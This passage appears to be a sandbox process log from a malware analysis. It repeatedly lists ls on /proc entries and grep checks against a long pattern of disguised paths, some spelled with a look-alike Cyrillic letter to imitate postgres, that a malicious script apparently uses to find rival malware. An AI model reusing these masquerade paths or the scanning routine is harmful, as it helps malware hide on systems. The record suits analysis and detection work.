  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:851
- /bin/ls
  ls -latrh /proc/223
  2⤵
  PID:853
- /bin/grep
  grep exe
  2⤵
  PID:854
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:856
- /bin/ls
  ls -latrh /proc/23
  2⤵
  PID:858
- /bin/grep
  grep exe
  2⤵
  PID:859
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:861
- /bin/grep
  grep exe
  2⤵
  PID:864
- /bin/ls
  ls -latrh /proc/24
  2⤵
  PID:863
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:866
- /bin/ls
  ls -latrh /proc/3
  2⤵
  PID:868
- /bin/grep
  grep exe
  2⤵
  PID:869
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:871
- /bin/grep
  grep exe
  2⤵
  PID:874
- /bin/ls
  ls -latrh /proc/310
  2⤵
  PID:873
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:876
- /bin/grep
  grep exe
  2⤵
  PID:879
- /bin/ls
  ls -latrh /proc/312
  2⤵
  PID:878
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:881
- /bin/ls
  ls -latrh /proc/313
  2⤵
  PID:883
- /bin/grep
  grep exe
  2⤵
  PID:884
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:886
- /bin/ls
  ls -latrh /proc/316
  2⤵
  PID:888
- /bin/grep
  grep exe
  2⤵
  PID:889
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:891
- /bin/ls
  ls -latrh /proc/345
  2⤵
  PID:893
- /bin/grep
  grep exe
  2⤵
  PID:894
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:896
- /bin/ls
  ls -latrh /proc/36
  2⤵
  PID:898
- /bin/grep
  grep exe
  2⤵
  PID:899
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:904
- /bin/ls
  ls -latrh /proc/37
  2⤵
  PID:906
- /bin/grep
  grep exe
  2⤵
  PID:907
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:909
- /bin/ls
  ls -latrh /proc/371
  2⤵
  PID:911
- /bin/grep
  grep exe
  2⤵
  PID:912
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:914
- /bin/grep
  grep exe
  2⤵
  PID:917
- /bin/ls
  ls -latrh /proc/372
  2⤵
  PID:916
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:919
- /bin/ls
  ls -latrh /proc/383
  2⤵
  PID:921
- /bin/grep
  grep exe
  2⤵
  PID:922
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:924
- /bin/grep
  grep exe
  2⤵
  PID:927
- /bin/ls
  ls -latrh /proc/384
  2⤵
  PID:926
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:929
- /bin/ls
  ls -latrh /proc/4
  2⤵
  PID:931
- /bin/grep
  grep exe
  2⤵
  PID:932
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:935
- /bin/ls
  ls -latrh /proc/402
  2⤵
  PID:938
- /bin/grep
  grep exe
  2⤵
  PID:939
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:941
- /bin/ls
  ls -latrh /proc/483
  2⤵
  PID:944
- /bin/grep
  grep exe
  2⤵
  PID:945
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:948
- /bin/ls
  ls -latrh /proc/496
  2⤵
  PID:950
- /bin/grep
  grep exe
  2⤵
  PID:951
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:954
- /bin/grep
  grep exe
  2⤵
  PID:958
- /bin/ls
  ls -latrh /proc/5
  2⤵
  PID:957
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:961
- /bin/grep
  grep exe
  2⤵
  PID:965
- /bin/ls
  ls -latrh /proc/532
  2⤵
  PID:964
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:967
- /bin/ls
  ls -latrh /proc/533
  2⤵
  PID:970
- /bin/grep
  grep exe
  2⤵
  PID:971
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:974
- /bin/grep
  grep exe
  2⤵
  PID:977
- /bin/ls
  ls -latrh /proc/6
  2⤵
  PID:976
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:981
- /bin/ls
  ls -latrh /proc/685
  2⤵
  PID:983
- /bin/grep
  grep exe
  2⤵
  PID:984
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:987
- /bin/ls
  ls -latrh /proc/698
  2⤵
  PID:989
- /bin/grep
  grep exe
  2⤵
  PID:990
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:993
- /bin/ls
  ls -latrh /proc/699
  2⤵
  PID:995
- /bin/grep
  grep exe
  2⤵
  PID:996
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1000
- /bin/ls
  ls -latrh /proc/7
  2⤵
  PID:1002
- /bin/grep
  grep exe
  2⤵
  PID:1003
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1006
- /bin/ls
  ls -latrh /proc/70
  2⤵
  PID:1009
- /bin/grep
  grep exe
  2⤵
  PID:1010
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1012
- /bin/grep
  grep exe
  2⤵
  PID:1016
- /bin/ls
  ls -latrh /proc/703
  2⤵
  PID:1015
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1019
- /bin/grep
  grep exe
  2⤵
  PID:1022
- /bin/ls
  ls -latrh /proc/704
  2⤵
  PID:1021
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1025
- /bin/ls
  ls -latrh /proc/705
  2⤵
  PID:1028
- /bin/grep
  grep exe
  2⤵
  PID:1029
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1032
- /bin/ls
  ls -latrh /proc/706
  2⤵
  PID:1035
- /bin/grep
  grep exe
  2⤵
  PID:1036
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1038
- /bin/ls
  ls -latrh /proc/71
  2⤵
  PID:1041
- /bin/grep
  grep exe
  2⤵
  PID:1042
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1045
- /bin/ls
  ls -latrh /proc/710
  2⤵
  PID:1048
- /bin/grep
  grep exe
  2⤵
  PID:1049
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1052
- /bin/grep
  grep exe
  2⤵
  PID:1055
